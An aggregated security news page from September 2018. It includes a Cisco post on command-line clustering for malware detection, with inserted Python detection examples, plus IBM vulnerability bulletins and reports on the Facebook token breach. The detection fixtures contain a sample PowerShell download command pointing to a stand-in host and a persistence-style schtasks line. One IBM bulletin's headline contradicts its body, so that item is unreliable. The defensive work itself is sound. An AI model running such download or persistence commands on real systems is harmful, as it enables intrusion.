Saturday, September 29, 2018

Web inventor Berners-Lee creates a new privacy first way of dealing with the internet

Telegram fixes IP address leak in desktop client

UK Conservative Party conference app leaks MPs' personal details

Defeating Polymorphic Malware with Cognitive Intelligence. Part 2: Command Line Argument Clustering

Co-authored with: Jan Jusko, Harry Nayyar, and Danila Khikhlukha.

Adversaries continue to evolve their techniques to evade detection. Static analysis approaches are prone to evasion through malicious packers, code obfuscation, and polymorphism. That means the vast majority of malware is unique to each target, which poses an ongoing challenge for traditional endpoint security solutions. At the same time, dynamic analysis, generally performed in a sandbox environment, has its own challenges around sandbox detection and evasion techniques. Malware authors like to play dirty tricks in defenders’ sandboxes.

Given that, it would be optimistic to expect organizations to catch up on their own: it is not only the rapid pace of change that challenges individual defender groups, but also the sophistication and the scale of these attacks.

Overcoming The Challenges

Mindfully listening to and understanding the most critical needs of our customers is vital for us. Helping solve those challenges is the core of our work at Cisco. We strive to do so by continuously improving existing ways, and exploring new ones, to make security teams more effective at what they do – protecting their organizations. With over 12 years of research experience, more than 80 machine learning scientists and engineers, and 60 patents and filings, the Cisco Cognitive Intelligence group, along with the AMP research team, is committed to helping customers achieve shared security goals.

In our previous blog post, Cognitive Intelligence: Empowering Security Analysts, Defeating Polymorphic Malware (Part 1), we showed how Cognitive Intelligence helps detect and prioritize breaches while providing context-rich (and organization-tailored) threat knowledge to incident response teams and how that knowledge helps focus on alerts that really matter. We have also looked at one of the recently implemented algorithms (Probabilistic Threat Propagation) that helps scale up the number of retrospectively convicted polymorphic malware samples through knowledge sharing between multiple threat intelligence sources available in the Cisco Security portfolio.

In this blog post, we present some of the steps that Cisco takes to improve detection efficacy even further by taking the same data and looking at it from a different angle. Cisco AMP for Endpoints is now able to convict polymorphic and evasive malware variants based on the command line arguments observed during sample execution. This capability also facilitates the automated creation of Cloud IOCs, increasing threat landscape coverage and providing actionable alerts with a greater level of detail and context. This blog explores how we build a reliable training set in a big data environment, how we use it for data clustering, and how we created an automated process for generating and vetting newly created Cloud IOCs.

Cloud IOCs

In AMP for Endpoints, Cloud IOCs are one of the most effective post-infection detection capabilities that help security teams surface malicious or suspicious behaviors observed on an endpoint. Quite often a Cloud IOC represents a combination of individual events that together likely indicate malicious intent.

  • Registry keys were modified to maintain persistence
  • Microsoft Word launched PowerShell using VBA macro
  • A suspicious scheduled task was created using schtasks command
  • WMI command tool was used to execute a command on a remote computer
  • PowerShell attempted to download content into a string or download a file and execute it

The examples above represent just a tiny fraction of the behaviors that Cloud IOCs can detect. The goal is to help analysts choose the right response action by combining their knowledge of their environment with the details provided in the alert.
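To make concrete how single process events combine into one behavioral alert of the kind listed above, here is an added example in Python. It is not the AMP engine or any Cisco code: the event schema, the host names, the IOC names and every command line are constructed to mirror the behaviors the list names (Office launching PowerShell, PowerShell downloading content, a scheduled task created with schtasks).

```python
import re

# Constructed process-start events; parent/child linkage is via pid/ppid on the same host.
EVENTS = [
    {"host": "ws01", "pid": 120, "ppid": 1,   "image": "explorer.exe",
     "cmdline": "explorer.exe"},
    {"host": "ws01", "pid": 410, "ppid": 120, "image": "WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invoice.docm"},
    {"host": "ws01", "pid": 522, "ppid": 410, "image": "powershell.exe",
     "cmdline": "powershell.exe -Command (New-Object Net.WebClient).DownloadString('http://example.invalid/p')"},
    {"host": "ws02", "pid": 800, "ppid": 700, "image": "schtasks.exe",
     "cmdline": "schtasks.exe /create /tn Updater /sc minute /mo 5 /tr C:\\Users\\Public\\u.exe"},
    {"host": "ws03", "pid": 901, "ppid": 50,  "image": "powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\nightly-backup.ps1"},
]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_RE = re.compile(r"\.(DownloadString|DownloadFile)\s*\(", re.IGNORECASE)

# Constructed IOC definitions: name plus the set of behaviors a process must show.
# Ordered most specific first, so the richest matching combination wins.
IOC_RULES = [
    ("OfficeMacroPowershellDownload", {"office_spawned_powershell", "powershell_download"}),
    ("OfficeSpawnedPowershell", {"office_spawned_powershell"}),
    ("PowershellDownload", {"powershell_download"}),
    ("SuspiciousScheduledTask", {"schtasks_create"}),
]


def index_by_pid(events):
    """Map (host, pid) -> event so a child process can look up its parent."""
    return {(e["host"], e["pid"]): e for e in events}


def office_spawned_powershell(events, by_pid):
    """Behavior: an Office process is the direct parent of powershell.exe."""
    hits = []
    for e in events:
        parent = by_pid.get((e["host"], e["ppid"]))
        if (e["image"].lower() == "powershell.exe" and parent
                and parent["image"].lower() in OFFICE_IMAGES):
            hits.append(("office_spawned_powershell", e))
    return hits


def powershell_download(events, by_pid):
    """Behavior: PowerShell downloading content into a string or to a file."""
    return [("powershell_download", e) for e in events
            if e["image"].lower() == "powershell.exe" and DOWNLOAD_RE.search(e["cmdline"])]


def schtasks_create(events, by_pid):
    """Behavior: a scheduled task being created via schtasks."""
    return [("schtasks_create", e) for e in events
            if e["image"].lower() == "schtasks.exe" and "/create" in e["cmdline"].lower()]


def run_cloud_iocs(events):
    """Group single behaviors by the process that showed them, then emit one
    alert per process, named after the most specific IOC its behaviors satisfy."""
    by_pid = index_by_pid(events)
    behaviors = {}
    for rule in (office_spawned_powershell, powershell_download, schtasks_create):
        for name, e in rule(events, by_pid):
            behaviors.setdefault((e["host"], e["pid"]), set()).add(name)

    alerts = []
    for (host, pid), names in behaviors.items():
        ioc = next((n for n, required in IOC_RULES if required <= names), None)
        if ioc is None:
            continue
        alerts.append({"host": host, "pid": pid, "ioc": ioc, "behaviors": sorted(names),
                       "cmdline": by_pid[(host, pid)]["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in run_cloud_iocs(EVENTS):
        print(f"{a['host']} pid={a['pid']} {a['ioc']}: {a['behaviors']}")
```

The combination rule is the point: the PowerShell process on ws01 is reported once, as the Office-to-PowerShell download chain, rather than as two disconnected findings, while the nightly backup script on ws03 produces nothing because it matches no behavior.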

Example Cloud IOC: W32.PowershellDownloadedExecutable.ioc

Cisco research teams drive all of these indicators. And while we always prioritize quality, in this case quantity is also important, as we observe adversaries utilizing new techniques daily. There are two ways to increase the number of behaviors being monitored: conduct more research to create new Cloud IOCs manually, or create new methods that allow automated generation of IOCs at scale to provide more comprehensive coverage. With automation like that, security teams can focus on the actionable alerts pinpointed by the algorithm (described further below). Since Cloud IOCs trigger on malicious behavior, they represent threats that were not prevented by other layers of security.

What’s New in 2018: Command Line Argument Clustering

Let’s go over one example algorithm that is designed to uncover previously unknown or evasive malware, convict polymorphic instances of known threats, and then turn these results into prevention capability. Given the architectural framework in which all of the AMP-enabled devices operate, this intelligence becomes immediately available for enforcement across the entire security architecture.

Command Line Argument Clustering is an algorithm that enables automated generation of Cloud IOCs at scale. It therefore improves the detection of malicious binaries based on their behavior as observed on endpoint systems that run an engine monitoring process executions (AMP for Endpoints).

The specific focus of the algorithm is on the command line arguments used to execute binaries. The choice of command line arguments for the Cloud IOCs is based on the fact that these arguments are often associated with particular malware families. The idea for this algorithm came up during discussions about the shortcomings of the more traditional static and dynamic analysis approaches. The Command Line Clustering algorithm complements them and adds a layer of security on top of them: it does not have to rely on an assessment of sample properties to evaluate maliciousness, and it does not require samples to run through dynamic analysis.

The IOCs resulting from command line clustering can represent known or unknown malware families. As such, some clusters may be considered classified when a known malware family is associated with a given cluster after research. On the other hand, when no single known malware family can be associated with a cluster, or where such attribution would require further research, an equally actionable, but less descriptive unclassified IOC can be created. Below are two examples of automatically generated Cloud IOCs: classified and unclassified.

Classified Auto-generated Cloud IOC: W32.Dealply2.ioc. In the classified event, a specific malware family (DealPly adware in the example above) and its known methods are named.

Unclassified Auto-generated Cloud IOC: W32.Generic.1682.cam.ioc. In the unclassified (generic) event, we see a behavioral profile that demonstrates malicious action, without attribution to a particular malware family.

There are hundreds of thousands of new malicious binaries generated by attackers daily. These malware samples belong to a variety of malware families. It is therefore infeasible to analyze any significant portion of them manually and create detection content based on the results of such analysis. In this research, we analyze the command line arguments that are passed to a binary upon execution. The goal is to cluster together binaries that use similar sets of command line arguments and automatically build Cloud IOCs that detect these common families with high precision. The key to success here is the availability of large amounts of balanced telemetry to be processed by the algorithm (and that is where we benefit from the large install base of AMP for Endpoints).

The algorithm progressively goes through the following steps in an automated fashion:

  • Data Collection, Transformation, and Clustering – collecting telemetry from executions of malicious, legitimate, and unknown binaries; parsing the command line arguments of all executed binaries so that only named arguments are processed further; constructing and clustering a graph that captures pairwise similarities between captured executions.
  • Cloud IOC Selection – creating candidate Cloud IOCs from the clusters of executions produced in the previous step (for each cluster, the command line arguments that provide the best coverage and precision are selected as an IOC) and then filtering out clusters that contain legitimate binaries; prioritizing clusters using various criteria (such as clusters containing executions of high-risk malware or clusters containing a high number of unique binary files); and finally converting clusters into Cloud IOCs by selecting the command line arguments that are typical for a particular cluster.
  • Cloud IOC Vetting – running newly created IOCs against in-field telemetry and monitoring their performance, then deploying those that ensure high accuracy for in-field malware detection. If all command line arguments contained in an IOC are present during sample execution (or, conversely, if certain arguments are absent), the Cloud IOC triggers a detection that notifies a security analyst about a potential compromise.

The Command Line Argument Clustering algorithm proves effective because different polymorphic malware families often use the same set of command line arguments. These are arguments that shouldn’t be observed alongside known benign files. Modern malware is complex and can consist of multiple components, and often a dropper component is responsible for executing a malicious binary. This dropper passes specific and unique command line arguments to the malicious binary. For example, a dropper that executes a ransomware binary can pass in the amount of ransom to demand as a command line argument. While the argument values can vary on a per-target or per-campaign basis, the argument name often remains the same and can be used as an effective indicator of compromise.
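The three-step pipeline above, together with the point that argument names rather than values carry the signal, as an added illustration in Python. This is not Cisco's code: the telemetry records, hash placeholders and command lines are constructed, and the Jaccard threshold, the connected-component clustering over the similarity graph, and the selection and vetting rules are assumptions chosen to mirror the description, not the production algorithm.

```python
import re
from itertools import combinations

# Constructed telemetry: (binary hash placeholder, verdict, command line as captured).
TELEMETRY = [
    ("sha256-mal-01", "malicious", "C:\\Users\\a\\drop.exe --ransom=500 --wallet=X1 --encrypt /silent"),
    ("sha256-mal-02", "malicious", "C:\\Users\\b\\xk3.exe --ransom=750 --wallet=A9 --encrypt /silent"),
    ("sha256-mal-03", "malicious", "C:\\Temp\\r.exe --encrypt --ransom=100 --wallet=Q7 /silent /nolog"),
    ("sha256-unk-04", "unknown",   "C:\\Temp\\upd.exe --ransom=300 --wallet=M2 --encrypt /silent"),
    ("sha256-ben-05", "benign",    "C:\\Program Files\\tool\\tool.exe --update /silent"),
    ("sha256-ben-06", "benign",    "C:\\Program Files\\tool\\tool.exe --update /silent --proxy=auto"),
    ("sha256-unk-07", "unknown",   "C:\\Temp\\x.exe --update /silent"),
]

# A named argument: -x, --name or /name; any =value suffix is ignored.
ARG_RE = re.compile(r"^(?:--?|/)([A-Za-z][\w-]*)")


def named_args(cmdline):
    """Names only ('--ransom=500' -> 'ransom'): values change per campaign,
    names usually do not, so only names feed the similarity measure."""
    names = set()
    for tok in cmdline.split():
        m = ARG_RE.match(tok)
        if m:
            names.add(m.group(1).lower())
    return frozenset(names)


def jaccard(a, b):
    return len(a & b) / len(a | b) if (a or b) else 0.0


def cluster(execs, threshold):
    """Connected components of the graph that joins two executions when the
    Jaccard similarity of their argument-name sets reaches the threshold."""
    parent = list(range(len(execs)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i, j in combinations(range(len(execs)), 2):
        if jaccard(execs[i]["args"], execs[j]["args"]) >= threshold:
            parent[find(i)] = find(j)
    groups = {}
    for i, e in enumerate(execs):
        groups.setdefault(find(i), []).append(e)
    return list(groups.values())


def select_ioc_args(members, benign_args):
    """Coverage: keep names every member uses. Precision: drop any name that
    is also seen on a known-benign execution anywhere in the telemetry."""
    common = frozenset.intersection(*(e["args"] for e in members))
    return frozenset(a for a in common if a not in benign_args)


def vet(ioc_args, execs):
    """Replay the candidate IOC over telemetry: it fires when all names are present."""
    hits = [e for e in execs if ioc_args <= e["args"]]
    return hits, [e for e in hits if e["verdict"] == "benign"]


def generate_iocs(telemetry, threshold=0.6, min_unique_binaries=2):
    execs = [{"sha": h, "verdict": v, "cmdline": c, "args": named_args(c)}
             for h, v, c in telemetry]
    benign_args = frozenset().union(*(e["args"] for e in execs if e["verdict"] == "benign"))
    iocs = []
    for members in cluster(execs, threshold):
        uniq = {e["sha"] for e in members}
        if any(e["verdict"] == "benign" for e in members):
            continue          # cluster contains legitimate binaries: filtered out
        if len(uniq) < min_unique_binaries:
            continue          # low priority: too few distinct binaries
        args = select_ioc_args(members, benign_args)
        hits, benign_hits = vet(args, execs)
        if not args or benign_hits:
            continue          # nothing distinctive, or fires on known-good: not deployable
        iocs.append({"args": sorted(args), "unique_binaries": len(uniq), "hits": len(hits),
                     "convicted_unknowns": sorted(e["sha"] for e in hits
                                                  if e["verdict"] == "unknown")})
    return iocs


if __name__ == "__main__":
    print(generate_iocs(TELEMETRY))
```

Two details worth noticing in the output: `silent` is dropped from the ransomware cluster's IOC because a benign updater also uses it, which is the precision filter at work, and the previously unknown binary `sha256-unk-04` is matched by the resulting IOC, which is the retrospective conviction the post describes.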

The elegance of Command Line Clustering is that it further increases coverage against today’s advanced threats. Though it is fully automated, it can also be guided by Cisco’s research team to ensure the highest level of efficacy. It also presents no computational cost to customers running AMP for Endpoints in their environments, as the processing is done in the Cisco Cloud infrastructure. The binaries that trigger generated Cloud IOCs are retrospectively marked malicious in the AMP Cloud, further decreasing the average Time To Detect. That also turns this capability into prevention that benefits all customers leveraging AMP in their environments (AMP for Email Security, WSA, NGFW, NGIPS, Umbrella and of course Endpoints).

If you are using AMP for Endpoints in your environment today, make sure to enable the Command Line Capture capability to immediately benefit from the efficacy improvements.

Conclusion

The Command Line Argument Clustering algorithm is an innovative weapon that helps security analysts uncover evasive malware and morphing threats in their environments. What previously required dedicated team members to put in hours of threat hunting or manual analysis is now automated. In a world where attackers continuously come up with new techniques to bypass traditional means of malware prevention, security teams should be empowered to move the security needle further. And in the end, it’s important to remember that nobody wins alone. For long-lasting results, and more consistent and predictable outcomes, it’s always best to act as a team that shares the same vision and goals. Check in for updates on other research work that Cisco is doing to help customers in their day-to-day battles in Part 3 of this blog series.

Additional Resources

AMP for Endpoints: http://cisco.com/go/ampendpoint

AMP for Endpoints Protection Lattice

Read more about Cognitive Intelligence research

Learn how to operationalize Cisco’s Advanced Threat Security portfolio: Behind The Perimeter – Fighting Advanced Adversaries



from Cisco Blog » Security https://ift.tt/2y2kNtE

IBM Security Bulletin: IBM Security Guardium is affected by a Publicly disclosed Apache Struts vulnerability

IBM Security Guardium has addressed the following vulnerability.

CVE(s): CVE-2018-11776

Affected product(s) and affected version(s):

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10732783
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/148694

The post IBM Security Bulletin: IBM Security Guardium is affected by a Publicly disclosed Apache Struts vulnerability appeared first on IBM PSIRT Blog.

Affected IBM Security Guardium

Affected Versions
IBM Security Guardium 10.1.4-10.5


from IBM Product Security Incident Response Team https://ift.tt/2xNmAnk

IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM i

There are multiple vulnerabilities in IBM® SDK Java™ Technology Edition that is used by IBM i.

CVE(s): CVE-2018-2964, CVE-2018-2973, CVE-2018-2940, CVE-2018-2952, CVE-2018-1656, CVE-2018-12539, CVE-2018-1517, CVE-2016-0705, CVE-2017-3732, CVE-2017-3736

Affected product(s) and affected version(s):

Releases 7.1, 7.2 and 7.3 of IBM i are affected.

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10731329
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/146827
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/146835
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/146803
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/146815
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/144882
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/148389
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/141681
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/111140
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/121313
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/134397

The post IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM i appeared first on IBM PSIRT Blog.



from IBM Product Security Incident Response Team https://ift.tt/2xNmyfc

IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium

There are multiple vulnerabilities in IBM® SDK Java™ Technology Edition, Version 6 used by IBM Security Guardium. These issues were disclosed as part of the IBM Java SDK updates in July 2018.

CVE(s): CVE-2017-3736, CVE-2017-3732, CVE-2016-0705, CVE-2018-1517, CVE-2018-1656, CVE-2018-2964, CVE-2018-2973, CVE-2018-2952, CVE-2018-2940, CVE-2018-12539

Affected product(s) and affected version(s):

IBM Security Guardium V10.0 – 10.5

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10732785
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/134397
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/121313
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/111140
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/141681
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/144882
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/146827
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/146835
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/146815
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/146803
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/148389

The post IBM Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium appeared first on IBM PSIRT Blog.



from IBM Product Security Incident Response Team https://ift.tt/2xMQgRA

IBM Security Bulletin: Cross-site scripting vulnerabilities affect multiple IBM Rational products based on IBM Jazz technology

Sep 29, 2018 9:01 am EDT

Categorized: Medium Severity


Cross-site scripting vulnerabilities affect multiple products: Collaborative Lifecycle Management (CLM), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rational Team Concert (RTC), Rational Quality Manager (RQM), Rational Rhapsody Design Manager (Rhapsody DM) and Rational Software Architect Design Manager (RSA DM).

CVE(s): CVE-2018-1558, CVE-2018-1689

Affected product(s) and affected version(s):

Rational Collaborative Lifecycle Management 5.0 – 6.0.6

Rational Quality Manager 5.0 – 5.0.2
Rational Quality Manager 6.0 – 6.0.6

Rational Team Concert 5.0 – 5.0.2
Rational Team Concert 6.0 – 6.0.6

Rational DOORS Next Generation 5.0 – 5.0.2
Rational DOORS Next Generation 6.0 – 6.0.6

Rational Engineering Lifecycle Manager 5.0 – 5.0.2
Rational Engineering Lifecycle Manager 6.0 – 6.0.6

Rational Rhapsody Design Manager 5.0 – 5.0.2
Rational Rhapsody Design Manager 6.0 – 6.0.6

Rational Software Architect Design Manager 5.0 – 5.0.2
Rational Software Architect Design Manager 6.0 – 6.0.1

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: http://www.ibm.com/support/docview.wss?uid=ibm10732477
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/142956
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/145508



from IBM Product Security Incident Response Team https://ift.tt/2xNmw74

IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Tivoli Netcool/OMNIbus (Multiple CVEs)

There are multiple vulnerabilities in IBM® Runtime Environment Java™ Technology Edition, Versions 6, 7 and 8 that are used by Tivoli Netcool/OMNIbus. These were disclosed as part of the IBM Java SDK updates in April 2018 and July 2018.

CVE(s): CVE-2018-2783, CVE-2018-2814, CVE-2018-1656, CVE-2018-12539

Affected product(s) and affected version(s):

Tivoli Netcool/OMNIbus 7.4.0
Tivoli Netcool/OMNIbus 8.1.0

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10733457
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/141939
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/141970
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/144882
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/148389

The post IBM Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect Tivoli Netcool/OMNIbus (Multiple CVEs) appeared first on IBM PSIRT Blog.



from IBM Product Security Incident Response Team https://ift.tt/2xNmuvY

IBM Security Bulletin: IBM Security Guardium is affected by a Using Components with Known Vulnerabilities vulnerability

IBM Security Guardium has addressed the following vulnerabilities.

CVE(s): CVE-2017-8039, CVE-2017-4971, CVE-2016-9878

Affected product(s) and affected version(s):

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10730313
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/135398
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/127748
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/120241

The post IBM Security Bulletin: IBM Security Guardium is affected by a Using Components with Known Vulnerabilities vulnerability appeared first on IBM PSIRT Blog.

Affected IBM Security Guardium

Affected Versions
IBM Security Guardium 10.5


from IBM Product Security Incident Response Team https://ift.tt/2xLbAH7

IBM Security Bulletin: IBM Security Guardium is affected by a Improper Certificate Validation vulnerability

Sep 26, 2018 9:00 am EDT | Low Severity

A vulnerability in CKEditor might affect IBM WebSphere Portal.

CVE(s):

Affected product(s) and affected version(s):

Affected Product | Affected Versions
IBM WebSphere Portal 9.0.0.0 – 9.0.0.0 CF15
IBM WebSphere Portal 8.5.0.0 – 8.5.0.0 CF15
IBM WebSphere Portal 8.0.0.0 – 8.0.0.1 CF22

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://ift.tt/2xNmr3g
Database: ...



from IBM Product Security Incident Response Team https://ift.tt/2xN0YaN

IBM Security Bulletin: IBM Security Guardium is affected by a Using Components with Known Vulnerabilities vulnerabilities

IBM Security Guardium has addressed the following vulnerabilities.

CVE(s): CVE-2015-8100, CVE-2015-5621, CVE-2014-3565

Affected product(s) and affected version(s):

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10730329
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/107941
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/105232
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/95638

The post IBM Security Bulletin: IBM Security Guardium is affected by a Using Components with Known Vulnerabilities vulnerabilities appeared first on IBM PSIRT Blog.

Affected IBM Security Guardium

Affected Versions
IBM Security Guardium 10.5


from IBM Product Security Incident Response Team https://ift.tt/2xMbGy1

IBM Security Bulletin: IBM Security Guardium is affected by a Missing Security Control vulnerability

IBM Security Guardium has addressed the following vulnerability.

CVE(s): CVE-2018-1501

Affected product(s) and affected version(s):

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10730323
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/141226

The post IBM Security Bulletin: IBM Security Guardium is affected by a Missing Security Control vulnerability appeared first on IBM PSIRT Blog.

Affected IBM Security Guardium

Affected Versions
IBM Security Guardium 10.5


from IBM Product Security Incident Response Team https://ift.tt/2xNmpZc

IBM Security Bulletin: IBM Security Guardium is affected by a Password in Clear Text vulnerability

IBM Security Guardium has addressed the following vulnerability.

CVE(s): CVE-2018-1498

Affected product(s) and affected version(s):

Refer to the following reference URLs for remediation and additional vulnerability details:
Source Bulletin: https://www-01.ibm.com/support/docview.wss?uid=ibm10730317
X-Force Database: https://exchange.xforce.ibmcloud.com/vulnerabilities/141223

The post IBM Security Bulletin: IBM Security Guardium is affected by a Password in Clear Text vulnerability appeared first on IBM PSIRT Blog.

Affected IBM Security Guardium

Affected Versions
IBM Security Guardium 10.5


from IBM Product Security Incident Response Team https://ift.tt/2xOMc30

Facebook Hacked — 10 Important Updates You Need To Know About


If you also found yourself logged out of Facebook on Friday, you are not alone.

Facebook forced more than 90 million users to log out and back into their accounts in response to a massive data breach.

On Friday afternoon, the social media giant disclosed that some unknown hackers managed to exploit three vulnerabilities in its website and steal data from 50 million users, and that as a precaution, the company reset access tokens for nearly 90 million Facebook users.

We covered a story yesterday based upon the information available at that time.


However, in a conference call [Transcript 1, Transcript 2] with reporters, Facebook vice president of product Guy Rosen shared a few more details of the terrible breach, which is believed to be the most significant security blunder in Facebook's history.

Below we have briefed the new developments in the Facebook data breach incident that you need to know about:

1.) Facebook Detected Breach After Noticing Unusual Traffic Spike

— Earlier this week, Facebook's security team noticed an unusual traffic spike on its servers, which, when investigated, revealed a massive cyber attack that had been ongoing since 16 September, aimed at stealing the data of millions of Facebook users.

2.) Hackers Exploited Total 3 Facebook Vulnerabilities

— The hack was accomplished using three distinct Facebook bugs in combination.

The first bug incorrectly offered users a video-uploading option within certain posts that let people wish their friends 'Happy Birthday' when accessed on the "View As" page.

The second bug was in the video uploader, which incorrectly generated an access token that had permission to log into the Facebook mobile app, which is otherwise not allowed.

The third bug was that the generated access token was not for you as the viewer but for the user you were looking up, giving attackers an opportunity to steal the keys to the account of the person they were simulating.

3.) Hackers Stole Secret Access Tokens for 50 Million Accounts

— The attackers walked away with secret access tokens for as many as 50 million Facebook users, which could then be used to take over accounts.

Access Tokens "are the equivalent of digital keys that keep people logged in to Facebook, so they don't need to re-enter their password every time they use the app."

4.) Your Facebook Account Password Has Not Been Compromised, But, Wait!

— The good news is that the attack did not reveal your Facebook account passwords, but here’s the bad news — it’s not even required.

An application or an attacker can use millions of secret access tokens to programmatically fetch information from each account using an API, without actually having your password or two-factor authentication code.

5.) Hackers Downloaded Users' Private Information Using Facebook API

— Although it is not clear how many accounts were accessed and what personal information was taken before Facebook detected the incident, the year-old vulnerabilities had left all your personal information, private messages, photos and videos wide open to hackers.

"Since we’ve only just started our investigation, we have yet to determine whether these accounts were misused or any information accessed," the company said.

6.) Your "Logged in as Facebook" Accounts at 3rd-Party Apps/Websites Are At Risk

— Since secret tokens enabled attackers to access accounts as the account holder themselves, it could have allowed them to access other third-party apps that were using Facebook login — a feature that lets you sign up for, and log in to, other online services using your Facebook credentials.

7.) Facebook Reset Access Tokens for 90 Million Accounts

— In response to the massive breach, Facebook reset access tokens for nearly 50 million affected Facebook accounts and an additional 40 million accounts, as a precaution. This means that nearly 90 Million Facebook users were logged out of their accounts on Friday.

8.) Check Active Sessions on Facebook to Find Out If Your Account Has Been Hacked

— Many Facebook users have noticed unknown IP addresses from foreign locations that had apparently accessed their account without authorization.

You can head on to "Account Settings → Security and Login → Where You're Logged In" to review the list of devices and their location that have accessed your Facebook account.

If you find a suspicious session that you never started, you can revoke its access in just one click.

9.) Breach Isn't Connected to the Hacker Who Pledged to Delete Zuckerberg's Personal Page

— Earlier this week, a Taiwanese hacker, Chang Chi-Yuang, claimed that he would demonstrate a critical zero-day vulnerability in Facebook by broadcasting himself hacking Mark Zuckerberg's Facebook page on Sunday.

However, it is not clear whether the latest Facebook breach has anything to do with Chang's claim; at least, Facebook does not believe so.

Besides this, Chang Chi-Yuang today says he canceled the stream and reported the bug to Facebook.

10.) Facebook Faces Class-Action Lawsuit Over The Massive Hack

— Just after the news of the breach went public, two residents, Carla Echavarria from California and another from Virginia, filed a class-action complaint against the social media giant in US District Court for the Northern District of California.

Both allege that Facebook failed to protect their data, and that of additional potential class members, from falling into the wrong hands due to its lack of proper security practices.

The social media giant has already been facing criticism over its handling of user data and its privacy policies in the wake of the Cambridge Analytica scandal, in which the personal data of 87 million Facebook users was sold to and misused by a data-mining firm without their consent.

Facebook has already reset account logins for tens of millions of users and is also advising affected users who had Instagram or Oculus accounts linked to their Facebook account to de-link and then link those accounts again so that the access tokens can be changed.

The vulnerabilities exploited by the hackers are fixed, and Facebook is working with the FBI to investigate the security incident, which has impacted approximately 2.5% of Facebook's user base of over 2 billion.

Since the investigation is still in the early stages, Facebook has yet to determine whether the attackers misused the stolen access tokens for 50 million accounts or if any information was accessed.



from The Hacker News https://ift.tt/2DERC6b

Friday, September 28, 2018

Facebook says it detected security breach after traffic spike

India's Supreme Court strips Universal ID scheme of its overreach but retains its essence

Facebook discloses network breach affecting 50 million user accounts

Hackers Steal 50 Million Facebook Users’ Access Tokens Using Zero-Day Flaw


2018 has been a terrible year for Facebook.

Facebook just admitted that an unknown hacker or group of hackers exploited a zero-day vulnerability in its social media platform that allowed them to steal secret access tokens for more than 50 million accounts.

In a brief blog post published Friday, Facebook revealed that its security team discovered the attack three days ago (on 25 September), and they are still investigating the security incident.

"We're taking this incredibly seriously and wanted to let everyone know what's happened and the immediate action we've taken to protect people's security," Facebook said.

The vulnerability, which has not yet been fully disclosed and has now been patched by Facebook, resided in the "View As" feature—an option that allows users to find out what other Facebook users would see if they visited your profile.

According to the social media giant, the vulnerability allowed hackers to steal secret access tokens that could then be used to take over user accounts.

Secret access tokens "are the equivalent of digital keys that keep people logged in to Facebook, so they don't need to re-enter their password every time they use the app."
